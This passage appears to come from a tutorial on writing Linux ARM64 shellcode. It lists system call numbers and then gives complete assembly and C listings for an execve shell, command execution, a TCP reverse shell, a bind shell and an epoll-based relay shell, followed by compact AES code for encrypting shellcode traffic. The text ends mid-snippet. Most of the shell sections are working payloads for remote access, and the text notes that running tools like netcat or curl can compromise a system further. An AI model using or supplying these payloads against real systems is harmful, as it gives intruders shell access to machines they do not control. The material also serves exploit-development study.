System calls are a bridge between user space and the kernel, which runs at a higher privilege level. Each call has its own unique number that is essentially an index into an array of function pointers located in the kernel. Whether you want to write to a file on disk, send and receive data over the network or just print a message to the screen, all of this must be performed via system calls at some point.
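
Before dropping down to assembly, the same idea can be tried from C with the syscall() wrapper, which takes the call number followed by its arguments. This is a minimal sketch for Linux; raw_getpid is a hypothetical name.

```c
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/syscall.h>

// Ask the kernel for the process ID by number instead of through
// the getpid() wrapper. SYS_getpid comes from <sys/syscall.h>, so the
// value matches whatever architecture the code is compiled for.
static long raw_getpid(void) {
    return syscall(SYS_getpid);
}
```

In assembly the number goes in x8, the arguments in x0 onwards, and SVC 0 enters the kernel, as the shellcodes in this section show.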

A full list of calls can be found in the Linux source tree on GitHub here, but if you’re already logged into a Linux system running on ARM64, you might find a list in /usr/include/asm-generic/unistd.h too. Here are a few to save you time looking them up.

  // Linux/AArch64 system calls
  .equ SYS_epoll_create1,   20
  .equ SYS_epoll_ctl,       21
  .equ SYS_epoll_pwait,     22
  .equ SYS_dup3,            24
  .equ SYS_fcntl,           25
  .equ SYS_statfs,          43
  .equ SYS_faccessat,       48
  .equ SYS_chroot,          51
  .equ SYS_fchmodat,        53
  .equ SYS_openat,          56
  .equ SYS_close,           57
  .equ SYS_pipe2,           59
  .equ SYS_read,            63
  .equ SYS_write,           64
  .equ SYS_pselect6,        72
  .equ SYS_ppoll,           73
  .equ SYS_splice,          76
  .equ SYS_exit,            93
  .equ SYS_futex,           98
  .equ SYS_kill,           129
  .equ SYS_reboot,         142
  .equ SYS_setuid,         146
  .equ SYS_setsid,         157
  .equ SYS_uname,          160
  .equ SYS_getpid,         172
  .equ SYS_getppid,        173
  .equ SYS_getuid,         174
  .equ SYS_getgid,         176
  .equ SYS_gettid,         178
  .equ SYS_socket,         198
  .equ SYS_bind,           200
  .equ SYS_listen,         201
  .equ SYS_accept,         202
  .equ SYS_connect,        203
  .equ SYS_sendto,         206
  .equ SYS_recvfrom,       207
  .equ SYS_setsockopt,     208
  .equ SYS_getsockopt,     209
  .equ SYS_shutdown,       210
  .equ SYS_munmap,         215
  .equ SYS_clone,          220
  .equ SYS_execve,         221
  .equ SYS_mmap,           222
  .equ SYS_mprotect,       226
  .equ SYS_wait4,          260
  .equ SYS_getrandom,      278
  .equ SYS_memfd_create,   279
  .equ SYS_access,        1033

All registers except those required to return values are preserved. System calls return results in x0 while everything else remains the same, including the conditional flags. In the shellcode, only immediate values and stack are used for strings. This is the approach I recommend because it allows manipulation of the string before it’s stored on the stack. Using LDR and the literal pool is a good alternative.
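
The shellcodes below load short strings with a single immediate such as BINSH, which is defined in include.inc (not shown here). Assuming that constant is simply the bytes of the string read as a little-endian 64-bit integer, the value can be worked out in C like this; pack8 is a hypothetical helper.

```c
#include <stdint.h>
#include <string.h>

// Pack up to 8 characters of a string into a 64-bit little-endian
// immediate, padding with zero bytes. pack8 is a hypothetical helper.
static uint64_t pack8(const char *s) {
    uint64_t v = 0;
    size_t n = strlen(s);
    if (n > 8) n = 8;
    for (size_t i = 0; i < n; i++)
        v |= (uint64_t)(unsigned char)s[i] << (8 * i);
    return v;
}
```

Under that assumption "/bin/sh" packs to 0x0068732F6E69622F, with the top byte doubling as the string terminator, and "-c" packs to 0x632D.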

6.2 Tracing

“strace” is a diagnostic and debugging utility for Linux that can show problems in your code. It will show which system calls are implemented by the kernel and which ones are simply wrapper functions in GLIBC. As I found out while writing some of the shellcodes, there are no dup2, pipe, or fork system calls. There are only wrapper functions in GLIBC that call dup3, pipe2 and clone.

6.3 Executing a shell.

// 40 bytes

    .arch armv8-a

    .include "include.inc"

    .global _start
    .text

_start:
    // execve("/bin/sh", NULL, NULL);
    mov    x8, SYS_execve
    mov    x2, xzr           // NULL
    mov    x1, xzr           // NULL
    movq   x3, BINSH         // "/bin/sh"
    str    x3, [sp, -16]!    // stores string on stack
    mov    x0, sp
    svc    0

6.4 Executing a command.

Executing a command can be a good replacement for a reverse connecting or bind shell: if a system can execute netcat, ncat, wget, curl or GET, then executing a command may be sufficient to compromise the system further. The following just echoes “Hello, World!” to the console.

// 64 bytes

    .arch armv8-a
    .align 4

    .include "include.inc"

    .global _start
    .text

_start:
    // execve("/bin/sh", {"/bin/sh", "-c", cmd, NULL}, NULL);
    movq   x0, BINSH             // x0 = "/bin/sh\0"
    str    x0, [sp, -64]!
    mov    x0, sp
    mov    x1, 0x632D            // x1 = "-c"
    str    x1, [sp, 16]
    add    x1, sp, 16
    adr    x2, cmd               // x2 = cmd
    stp    x0, x1,  [sp, 32]     // store argv[0] = "/bin/sh", argv[1] = "-c"
    stp    x2, xzr, [sp, 48]     // store cmd, NULL
    mov    x2, xzr               // penv = NULL
    add    x1, sp, 32            // x1 = argv
    mov    x8, SYS_execve
    svc    0
cmd:
    .asciz "echo Hello, World!"

6.5 Reverse connecting shell over TCP.

The reverse shell makes an outgoing connection to a remote host and upon connection will spawn a shell that accepts input. Rather than use PC-relative instructions, the network address structure is initialized using immediate values.

// 120 bytes

    .arch armv8-a

    .include "include.inc"

    .equ PORT, 1234
    .equ HOST, 0x0100007F // 127.0.0.1

    .global _start
    .text

_start:
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    mov     x8, SYS_socket
    mov     x2, IPPROTO_IP
    mov     x1, SOCK_STREAM
    mov     x0, AF_INET
    svc     0

    mov     w3, w0       // w3 = s

    // connect(s, &sa, sizeof(sa));
    mov     x8, SYS_connect
    mov     x2, 16
    movq    x1, ((HOST << 32) | ((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    str     x1, [sp, -16]!
    mov     x1, sp     // x1 = &sa 
    svc     0

    // in this order
    //
    // dup3(s, STDERR_FILENO, 0);
    // dup3(s, STDOUT_FILENO, 0);
    // dup3(s, STDIN_FILENO,  0);
    mov     x8, SYS_dup3
    mov     x1, STDERR_FILENO + 1
c_dup:
    mov     x2, xzr
    mov     w0, w3
    subs    x1, x1, 1
    svc     0
    bne     c_dup

    // execve("/bin/sh", NULL, NULL);
    mov     x8, SYS_execve
    movq    x0, BINSH
    str     x0, [sp]
    mov     x0, sp
    svc     0
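
The immediate passed to movq packs the first eight bytes of a sockaddr_in into one register. The C sketch below rebuilds that value and compares it with a structure filled in the usual way. It assumes a little-endian Linux target, and both function names are mine.

```c
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

// Build the 64-bit immediate the shellcode stores as its sockaddr_in:
// family in bits 0-15, byte-swapped port in bits 16-31, address in
// bits 32-63. host is the address as a little-endian CPU reads it from
// network-order bytes (127.0.0.1 -> 0x0100007F).
static uint64_t sockaddr_imm(uint32_t host, uint16_t port) {
    uint64_t swapped = (uint64_t)(((port & 0xFF) << 8) | (port >> 8));
    return ((uint64_t)host << 32) | (swapped << 16) | AF_INET;
}

// Compare the immediate with the first 8 bytes of a sockaddr_in filled
// in the usual way. Assumes a little-endian Linux target.
static int matches_struct(uint64_t imm, const char *ip, uint16_t port) {
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof(sa));
    sa.sin_family      = AF_INET;
    sa.sin_port        = htons(port);
    sa.sin_addr.s_addr = inet_addr(ip);
    return memcmp(&imm, &sa, sizeof(imm)) == 0;
}
```

The remaining eight bytes of the structure are padding, which is why a single 64-bit store into a 16-byte stack slot is enough for connect.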

6.6 Bind shell over TCP.

Pretty much the same as the reverse shell, except we listen for incoming connections using three separate system calls: bind, listen and accept are used in place of connect. This could easily be updated to include connect using the conditional assembly discussed before.

// 148 bytes

    .arch armv8-a

    .include "include.inc"

    .equ PORT, 1234

    .global _start
    .text

_start:
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    mov     x8, SYS_socket
    mov     x2, IPPROTO_IP
    mov     x1, SOCK_STREAM
    mov     x0, AF_INET
    svc     0

    mov     w3, w0       // w3 = s

    // bind(s, &sa, sizeof(sa));  
    mov     x8, SYS_bind
    mov     x2, 16
    movl    w1, (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    str     x1, [sp, -16]!
    mov     x1, sp
    svc     0

    // listen(s, 1);
    mov     x8, SYS_listen
    mov     x1, 1
    mov     w0, w3
    svc     0

    // r = accept(s, 0, 0);
    mov     x8, SYS_accept
    mov     x2, xzr
    mov     x1, xzr
    mov     w0, w3
    svc     0

    mov     w3, w0

    // in this order
    //
    // dup3(s, STDERR_FILENO, 0);
    // dup3(s, STDOUT_FILENO, 0);
    // dup3(s, STDIN_FILENO,  0);
    mov     x8, SYS_dup3
    mov     x1, STDERR_FILENO + 1
c_dup:
    mov     w0, w3
    subs    x1, x1, 1
    svc     0
    bne     c_dup

    // execve("/bin/sh", NULL, NULL);
    mov     x8, SYS_execve
    movq    x0, BINSH
    str     x0, [sp]
    mov     x0, sp
    svc     0

6.7 Synchronized shell

“And now for something completely different.”

There’s nothing wrong with the bind or reverse shells mentioned. They work fine. However, it’s not possible to manipulate the incoming or outgoing streams of data, so there isn’t any confidentiality provided between two systems. To solve this we use synchronization. Most POSIX systems offer the select function for this purpose. It allows one to monitor I/O of file descriptors. However, select is limited in how many descriptors it can monitor in a single process. For that reason, kqueue on BSD and epoll on Linux were developed, as they are unaffected by the same limitations.

#define _GNU_SOURCE

#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <signal.h>
#include <sys/epoll.h>
#include <fcntl.h>
#include <sched.h>

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>

int main(void) {
    struct sockaddr_in sa;
    int                i, r, w, s, len, efd; 
    #ifdef BIND
    int                s2;
    #endif
    int                fd, in[2], out[2];
    char               buf[BUFSIZ];
    struct epoll_event evts;
    char               *args[]={"/bin/sh", NULL};
    pid_t              ctid, pid;
 
    // create pipes for redirection of stdin/stdout/stderr
    pipe2(in, 0);
    pipe2(out, 0);

    // fork process
    ctid = syscall(SYS_gettid);
    
    pid  = syscall(SYS_clone, 
        CLONE_CHILD_SETTID   | 
        CLONE_CHILD_CLEARTID | 
        SIGCHLD, 0, NULL, 0, &ctid);

    // if child process
    if (pid == 0) {
      // assign read end to stdin
      dup3(in[0],  STDIN_FILENO,  0);
      // assign write end to stdout   
      dup3(out[1], STDOUT_FILENO, 0);
      // assign write end to stderr  
      dup3(out[1], STDERR_FILENO, 0);  
      
      // close pipes
      close(in[0]);  close(in[1]);
      close(out[0]); close(out[1]);
      
      // execute shell
      execve(args[0], args, 0);
    } else {      
      // close read and write ends
      close(in[0]); close(out[1]);
      
      // create a socket
      s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
      
      sa.sin_family = AF_INET;
      sa.sin_port   = htons(atoi("1234"));
      
      #ifdef BIND
        // bind to port for incoming connections
        sa.sin_addr.s_addr = INADDR_ANY;
        
        bind(s, (struct sockaddr*)&sa, sizeof(sa));
        listen(s, 0);
        r = accept(s, 0, 0);
        s2 = s; s = r;
      #else
        // connect to remote host
        sa.sin_addr.s_addr = inet_addr("127.0.0.1");
      
        r = connect(s, (struct sockaddr*)&sa, sizeof(sa));
      #endif
      
      // if ok
      if (r >= 0) {
        // open an epoll file descriptor
        efd = epoll_create1(0);
 
        // add 2 descriptors to monitor stdout and socket
        for (i=0; i<2; i++) {
          fd = (i==0) ? s : out[0];
          evts.data.fd = fd;
          evts.events  = EPOLLIN;
        
          epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
        }
          
        // now loop until user exits or some other error
        for (;;) {
          r = epoll_pwait(efd, &evts, 1, -1, NULL);
                  
          // error? bail out           
          if (r < 0) break;
         
          // not input? bail out
          if (!(evts.events & EPOLLIN)) break;

          fd = evts.data.fd;
          
          // assign socket or read end of output
          r = (fd == s) ? s     : out[0];
          // assign socket or write end of input
          w = (fd == s) ? in[1] : s;

          // read from socket or stdout        
          len = read(r, buf, BUFSIZ);

          if (!len) break;
          
          // encrypt/decrypt data here
          
          // write to socket or stdin        
          write(w, buf, len);        
        }      
        // remove 2 descriptors 
        epoll_ctl(efd, EPOLL_CTL_DEL, s, NULL);                  
        epoll_ctl(efd, EPOLL_CTL_DEL, out[0], NULL);                  
        close(efd);
      }
      // shutdown socket
      shutdown(s, SHUT_RDWR);
      close(s);
      #ifdef BIND
        close(s2);
      #endif
      // terminate shell      
      kill(pid, SIGCHLD);            
    }
    close(in[1]);
    close(out[0]);
    return 0; 
}

Let’s see how some of these calls were implemented using the A64 instruction set. First, replacing the standard I/O handles with pipe descriptors.

  // assign read end to stdin
  dup3(in[0],  STDIN_FILENO,  0);
  // assign write end to stdout   
  dup3(out[1], STDOUT_FILENO, 0);
  // assign write end to stderr  
  dup3(out[1], STDERR_FILENO, 0);  

The write end of out is assigned to stdout and stderr while the read end of in is assigned to stdin. We can perform this with the following.

    mov     x8, SYS_dup3
    mov     x2, xzr
    mov     x1, xzr
    ldr     w0, [sp, in0]
    svc     0

    add     x1, x1, 1
    ldr     w0, [sp, out1]
    svc     0

    add     x1, x1, 1
    ldr     w0, [sp, out1]
    svc     0

Eleven instructions or 44 bytes are used for this. If we want to save a few bytes, we could use a loop instead. The value of STDIN_FILENO is conveniently zero and STDERR_FILENO is 2. We can simply loop over the descriptors 0 to 2 and use a ternary operator to choose the correct pipe end.

  for (i=0; i<3; i++) {
    dup3(i==0 ? in[0] : out[1], i, 0);
  }

To perform the same operation in assembly, we can use the CSEL instruction.

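    mov     x8, SYS_dup3
    mov     x1, (STDERR_FILENO + 1) // x1 = 3
    mov     x2, xzr                 // x2 = 0
    ldr     w3, [sp, in0]           // w3 = in[0]
    ldr     w4, [sp, out1]          // w4 = out[1]
c_dup:
    subs    x1, x1, 1               // x1--, sets Z when x1 reaches 0
    csel    w0, w3, w4, eq          // w0 = (x1==0) ? in[0] : out[1]
    svc     0
    cbnz    x1, c_dup

Using a loop in place of what we originally had, we remove two instructions and save eight bytes. in[0] and out[1] are not adjacent in memory, so they are loaded with two separate LDR instructions rather than a single LDP. In the final listing x2 is already zero at this point, so the MOV that clears it can be dropped as well, for a total saving of twelve bytes. A similar operation can be implemented for closing the pipe handles. In the C code, it simply closes each one in separate statements like so.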

  // close pipes
  close(in[0]);  close(in[1]);
  close(out[0]); close(out[1]);

For the assembly code, a loop is used instead. Six instructions are used instead of eight.

    mov     x1, 4*4          // i = 4
    mov     x8, SYS_close
cls_pipe:
    sub     x1, x1, 4        // i--
    ldr     w0, [sp, x1]     // w0 = pipes[i]
    svc     0
    cbnz    x1, cls_pipe     // while (i != 0)

The epoll_pwait system call is used instead of the pselect6 system call to monitor file descriptors. Before calling epoll_pwait we must create an epoll file descriptor using epoll_create1 and add descriptors to it using epoll_ctl. The following code does that once a connection to remote peer has been established.

  // add 2 descriptors to monitor stdout and socket
  for (i=0; i<2; i++) {
    fd = (i==0) ? s : out[0];
    evts.data.fd = fd;
    evts.events  = EPOLLIN;
  
    epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
  }

All registers except x0, including the process state, are preserved across system calls. So we could implement the above code using the following assembly code.

    mov     x8, SYS_epoll_ctl
    add     x3, sp, evts       // x3 = &evts
    mov     x1, EPOLL_CTL_ADD  // x1 = EPOLL_CTL_ADD
    mov     x4, EPOLLIN

    ldr     w2, [sp, s]        // w2 = s
    stp     x4, x2, [sp, evts]
    ldr     w0, [sp, efd]      // w0 = efd
    svc     0

    ldr     w2, [sp, out0]     // w2 = out[0]
    stp     x4, x2, [sp, evts]
    ldr     w0, [sp, efd]      // w0 = efd
    svc     0

Twelve instructions, or forty-eight bytes, are used here. Using a loop, let’s see if we can save more space. Some of you may have noticed both EPOLL_CTL_ADD and EPOLLIN are 1, so a single register can hold both. We can save 4 bytes with the following.

    // epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
    ldr     w2, [sp, s]
    ldr     w4, [sp, out0]
poll_init:
    mov     x8, SYS_epoll_ctl
    mov     x1, EPOLL_CTL_ADD
    add     x3, sp, evts
    stp     x1, x2, [x3]
    ldr     w0, [sp, efd]
    svc     0
    cmp     w2, w4
    mov     w2, w4
    bne     poll_init
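
Storing the event mask and the descriptor with one STP of two 64-bit registers relies on the data member of struct epoll_event sitting at offset 8, which is the natural layout on AArch64. On x86-64 the C library declares the structure packed, so the same trick would not carry over. A quick C check of the layout, as a sketch with function names of my own:

```c
#include <stddef.h>
#include <sys/epoll.h>

// Byte offset of the data union inside struct epoll_event.
// Expected to be 8 on AArch64 (natural alignment) and 4 on x86-64,
// where the C library declares the structure packed.
static size_t epoll_data_offset(void) {
    return offsetof(struct epoll_event, data);
}

// Total size of the structure: 16 bytes on AArch64, 12 on x86-64.
static size_t epoll_event_size(void) {
    return sizeof(struct epoll_event);
}
```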

The value returned by the epoll_pwait system call must be checked before continuing to process the events structure. If successful, it will return the number of file descriptors that were signalled while -1 will indicate an error.

  r = epoll_pwait(efd, &evts, 1, -1, NULL);
          
  // error? bail out           
  if (r < 0) break;

Recall the Common Operations section, where we tested for -1. One could use the following assembly code.

    tst     x0, x0
    bmi     cls_efd

A64 provides a conditional branch opcode that allows us to execute the IF statement in one instruction.

    tbnz    x0, 31, cls_efd

After this check, we then need to determine if the signal was the result of input. We are only monitoring for input to a read end of pipe and socket. Every other event would indicate an error.

  // not input? bail out
  if (!(evts.events & EPOLLIN)) break;

  fd = evts.data.fd;

The value of EPOLLIN is 1, and we only want that type of event. We mask the value of events with 1 using a bitwise AND; if the result is zero, the event was something other than input (for example, the peer has disconnected) and we bail out. Load pair is used to load both the events and data_fd values simultaneously.

    // x0 = evts.events, x1 = evts.data.fd
    ldp     x0, x1, [sp, evts]

    // if (!(evts.events & EPOLLIN)) break;
    tbz     w0, 0, cls_efd

Our code will read from either out[0] or s.

  // assign socket or read end of output
  r = (fd == s) ? s     : out[0];
  // assign socket or write end of input
  w = (fd == s) ? in[1] : s;

Using the highly useful conditional select instruction, we can select the correct descriptors to read and write to.

    // w3 = s
    ldr     w3, [sp, s]
    // w5 = in[1], w4 = out[0]
    ldp     w5, w4, [sp, in1]

    // fd == s
    cmp     w1, w3

    // r = (fd == s) ? s : out[0];
    csel    w0, w3, w4, eq

    // w = (fd == s) ? in[1] : s;
    csel    w3, w5, w3, eq

The final assembly code for the synchronized shell follows.

    .arch armv8-a
    .align 4

    // default TCP port
    .equ PORT, 1234

    // default host, 127.0.0.1
    .equ HOST, 0x0100007F

    // comment out for a reverse connecting shell
    .equ BIND, 1

    // comment out for code to behave as a function
    .equ EXIT, 1

    .include "include.inc"

    // structure for stack variables

          .struct 0
    p_in: .skip 8
          .equ in0, p_in + 0
          .equ in1, p_in + 4

    p_out:.skip 8
          .equ out0, p_out + 0
          .equ out1, p_out + 4

    id:   .skip 8
    efd:  .skip 4
    s:    .skip 4

    .ifdef BIND
    s2:   .skip 8
    .endif

    evts: .skip 16
          .equ events, evts + 0
          .equ data_fd,evts + 8

    buf:  .skip BUFSIZ
    ds_tbl_size:

    .global _start
    .text
_start:
    // allocate memory for variables
    // ensure data structure aligned by 16 bytes
    sub     sp, sp, (ds_tbl_size & -16) + 16

    // create pipes for stdin
    // pipe2(in, 0);
    mov     x8, SYS_pipe2
    mov     x1, xzr
    add     x0, sp, p_in
    svc     0

    // create pipes for stdout + stderr
    // pipe2(out, 0);
    add     x0, sp, p_out
    svc     0

    // syscall(SYS_gettid);
    mov     x8, SYS_gettid
    svc     0
    str     w0, [sp, id]

    // clone(CLONE_CHILD_SETTID   | 
    //       CLONE_CHILD_CLEARTID | 
    //       SIGCHLD, 0, NULL, NULL, &ctid)
    mov     x8, SYS_clone
    add     x4, sp, id           // ctid
    mov     x3, xzr              // newtls
    mov     x2, xzr              // ptid
    movl    x0, (CLONE_CHILD_SETTID + CLONE_CHILD_CLEARTID + SIGCHLD)
    svc     0
    str     w0, [sp, id]         // save id
    cbnz    w0, opn_con          // if already forked?
                                 // open connection
    // in this order..
    //
    // dup3 (out[1], STDERR_FILENO, 0);
    // dup3 (out[1], STDOUT_FILENO, 0);
    // dup3 (in[0],  STDIN_FILENO , 0);
    mov     x8, SYS_dup3
    mov     x1, STDERR_FILENO + 1
    ldr     w3, [sp, in0]
    ldr     w4, [sp, out1]
c_dup:
    subs    x1, x1, 1
    // w0 = (x1 == 0) ? in[0] : out[1];
    csel    w0, w3, w4, eq
    svc     0
    cbnz    x1, c_dup

    // close pipe handles in this order..
    //
    // close(in[0]);
    // close(in[1]);
    // close(out[0]);
    // close(out[1]);
    mov     x1, 4*4
    mov     x8, SYS_close
cls_pipe:
    sub     x1, x1, 4
    ldr     w0, [sp, x1]
    svc     0
    cbnz    x1, cls_pipe

    // execve("/bin/sh", NULL, NULL);
    mov     x8, SYS_execve
    movq    x0, BINSH
    str     x0, [sp, -16]!
    mov     x0, sp
    svc     0
opn_con:
    // close(in[0]);
    mov     x8, SYS_close
    ldr     w0, [sp, in0]
    svc     0

    // close(out[1]);
    ldr     w0, [sp, out1]
    svc     0

    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    mov     x8, SYS_socket
    mov     x1, SOCK_STREAM
    mov     x0, AF_INET
    svc     0

    mov     x2, 16      // x2 = sizeof(sin)
    str     w0, [sp, s] // w0 = s
.ifdef BIND
    movl    w1, (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    str     x1, [sp, -16]!
    mov     x1, sp
    // bind (s, &sa, sizeof(sa));
    mov     x8, SYS_bind
    svc     0
    add     sp, sp, 16
    cbnz    x0, cls_sck  // if(x0 != 0) goto cls_sck

    // listen (s, 1);
    mov     x8, SYS_listen
    mov     x1, 1
    ldr     w0, [sp, s]
    svc     0

    // accept (s, 0, 0);
    mov     x8, SYS_accept
    mov     x2, xzr
    mov     x1, xzr
    ldr     w0, [sp, s]
    svc     0

    ldr     w1, [sp, s]      // load binding socket
    stp     w0, w1, [sp, s]
    mov     x0, xzr
.else
    movq    x1, ((HOST << 32) | (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET))
    str     x1, [sp, -16]!
    mov     x1, sp
    // connect (s, &sa, sizeof(sa));
    mov     x8, SYS_connect
    svc     0
    add     sp, sp, 16
    cbnz    x0, cls_sck      // if(x0 != 0) goto cls_sck
.endif
    // efd = epoll_create1(0);
    mov     x8, SYS_epoll_create1
    svc     0
    str     w0, [sp, efd]

    // epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
    ldr     w2, [sp, s]
    ldr     w4, [sp, out0]
poll_init:
    mov     x8, SYS_epoll_ctl
    mov     x1, EPOLL_CTL_ADD
    add     x3, sp, evts
    stp     x1, x2, [x3]
    ldr     w0, [sp, efd]
    svc     0
    cmp     w2, w4
    mov     w2, w4
    bne     poll_init
    // now loop until user exits or some other error
poll_wait:
    // epoll_pwait(efd, &evts, 1, -1, NULL);
    mov     x8, SYS_epoll_pwait
    mov     x4, xzr              // sigmask   = NULL
    mvn     x3, xzr              // timeout   = -1
    mov     x2, 1                // maxevents = 1
    add     x1, sp, evts         // *events   = &evts
    ldr     w0, [sp, efd]        // epfd      = efd
    svc     0

    // if (r < 0) break;
    tbnz    x0, 31, cls_efd

    // if (!(evts.events & EPOLLIN)) break;
    ldp     x0, x1, [sp, evts]
    tbz     w0, 0, cls_efd

    ldr     w3, [sp, s]
    ldp     w5, w4, [sp, in1]

    cmp     w1, w3

    // r = (fd == s) ? s : out[0];
    csel    w0, w3, w4, eq

    // w = (fd == s) ? in[1] : s;
    csel    w3, w5, w3, eq

    // read(r, buf, BUFSIZ);
    mov     x8, SYS_read
    mov     x2, BUFSIZ
    add     x1, sp, buf
    svc     0
    cbz     x0, cls_efd

    // encrypt/decrypt buffer

    // write(w, buf, len);
    mov     x8, SYS_write
    mov     w2, w0
    mov     w0, w3
    svc     0
    b       poll_wait
cls_efd:
    // epoll_ctl(efd, EPOLL_CTL_DEL, s, NULL);
    mov     x8, SYS_epoll_ctl
    mov     x3, xzr
    mov     x1, EPOLL_CTL_DEL
    ldp     w0, w2, [sp, efd]
    svc     0

    // epoll_ctl(efd, EPOLL_CTL_DEL, out[0], NULL);
    ldr     w2, [sp, out0]
    ldr     w0, [sp, efd]
    svc     0

    // close(efd);
    mov     x8, SYS_close
    ldr     w0, [sp, efd]
    svc     0

    // shutdown(s, SHUT_RDWR);
    mov     x8, SYS_shutdown
    mov     x1, SHUT_RDWR
    ldr     w0, [sp, s]
    svc     0
cls_sck:
    // close(s);
    mov     x8, SYS_close
    ldr     w0, [sp, s]
    svc     0

.ifdef BIND
    // close(s2);
    mov     x8, SYS_close
    ldr     w0, [sp, s2]
    svc     0
.endif
    // kill(pid, SIGCHLD);
    mov     x8, SYS_kill
    mov     x1, SIGCHLD
    ldr     w0, [sp, id]
    svc     0

    // close(in[1]);
    mov     x8, SYS_close
    ldr     w0, [sp, in1]
    svc     0

    // close(out[0]);
    mov     x8, SYS_close
    ldr     w0, [sp, out0]
    svc     0

.ifdef EXIT
    // exit(0);
    mov     x8, SYS_exit
    svc     0
.else
    // deallocate stack
    add     sp, sp, (ds_tbl_size & -16) + 16
    ret
.endif

7. Encryption

Every one of you reading this should learn about cryptography. Yes, it’s a complex subject, but you don’t need to be a mathematician just to learn about all the various algorithms that exist. Many cryptographic algorithms intended to protect data exist, but not all of them were designed for resource-constrained environments. In this section, you’ll see a number of cryptographic algorithms that you might consider using in a shellcode at some point. The block ciphers only implement encryption. That is to say, no inverse function is provided, so they cannot be used to decrypt in a mode like Cipher Block Chaining (CBC). Encryption is all that’s required to implement Counter (CTR) mode. Moreover, it’s likely that permutation-based cryptography will eventually replace traditional types of encryption. The algorithms shown here are intentionally optimized for size rather than speed.

Also…None of the algorithms presented here are written to protect against side-channel attacks. That’s just in case anyone wants to point out a weakness. 😉
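
To illustrate why an encrypt-only block cipher is enough for CTR mode, here is a minimal C sketch. It assumes a cipher that encrypts in place on a 32-byte buffer holding 16 bytes of block followed by 16 bytes of key, and a big-endian counter; both are my assumptions. toy_enc is a stand-in that only exercises the code and is not a cipher you should use.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Any 128-bit block encryption with a 128-bit key, operating in place
// on a 32-byte buffer: 16 bytes of block followed by 16 bytes of key.
typedef void (*block_enc)(uint8_t *state);

// Encrypt or decrypt len bytes in CTR mode. ctr is a 16-byte big-endian
// counter block that is advanced once per keystream block.
static void ctr_crypt(block_enc enc, const uint8_t key[16],
                      uint8_t ctr[16], uint8_t *data, size_t len) {
    uint8_t state[32];

    while (len) {
        // keystream block = E(key, counter)
        memcpy(state, ctr, 16);
        memcpy(state + 16, key, 16);
        enc(state);

        // XOR the keystream into the data
        size_t n = len < 16 ? len : 16;
        for (size_t i = 0; i < n; i++) data[i] ^= state[i];
        data += n;
        len  -= n;

        // increment the counter, propagating the carry
        for (int i = 15; i >= 0; i--)
            if (++ctr[i]) break;
    }
}

// Stand-in cipher used only to exercise ctr_crypt; NOT secure.
static void toy_enc(uint8_t *state) {
    for (int i = 0; i < 16; i++)
        state[i] = (uint8_t)((state[i] ^ state[16 + i]) + i);
}

// Applying ctr_crypt twice with the same key and starting counter must
// give back the original bytes. Returns 1 on success.
static int ctr_roundtrip_ok(void) {
    uint8_t key[16] = {1, 2, 3};
    uint8_t c1[16] = {0}, c2[16] = {0};
    uint8_t msg[40], ref[40];

    memset(msg, 'A', sizeof(msg));
    memcpy(ref, msg, sizeof(msg));

    ctr_crypt(toy_enc, key, c1, msg, sizeof(msg));    // encrypt
    if (memcmp(msg, ref, sizeof(msg)) == 0) return 0; // must differ
    ctr_crypt(toy_enc, key, c2, msg, sizeof(msg));    // decrypt
    return memcmp(msg, ref, sizeof(msg)) == 0 && c1[15] == 3;
}
```

Decryption is the same call as encryption because the data is only ever XORed with the keystream, so the inverse cipher is never needed.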

7.1 AES-128

A block cipher published in 1998 and originally called ‘Rijndael’ after its designers, Vincent Rijmen and Joan Daemen. Today, it’s known as the Advanced Encryption Standard (AES). I’ve included it here because AES extensions are only an optional component of ARM. The Cortex-A53 that comes with the Raspberry Pi 3 does not have support for AES. This implementation along with others can be found in this GitHub repository.

ADVANCED ENCRYPTION STANDARD (AES)

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned char B;
typedef unsigned int W;
// Multiplication over GF(2**8)
W M(W x){
    W t=x&0x80808080;
    return((x^t)*2)^((t>>7)*27);
}
// SubByte
B S(B w) {
    B j,y,z;
    
    if(w) {
      for(z=j=0,y=1;--j;y=(!z&&y==w)?z=1:y,y^=M(y));
      z=y;F(4)z^=y=(y<<1)|(y>>7);
    }
    return z^99;
}
void E(B *s) {
    W i,w,x[8],c=1,*k=(W*)&x[4];

    // copy plain text + master key to x
    F(8)x[i]=((W*)s)[i];

    for(;;){
      // AddRoundKey, 1st part of ExpandRoundKey
      w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];

      // AddRoundConstant, perform 2nd part of ExpandRoundKey
      w=R(w,8)^c;F(4)w=k[i]^=w;

      // if round 11, stop; 
      if(c==108)break; 
      
      // update round constant
      c=M(c);

      // SubBytes and ShiftRows
      F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);

      // if not round 11, MixColumns
      if(c!=108)
        F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    }
}
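
The test against 108 is worth a second look: the round constant starts at 1 and is doubled in GF(2**8) once per round, so it passes through the ten AES-128 constants (1, 2, 4, ..., 0x80, 0x1B, 0x36) and becomes 0x6C (108) on the next doubling. The following C sketch reuses M from the listing to confirm this; doublings_until is a hypothetical helper.

```c
#include <stdint.h>

typedef uint32_t W;

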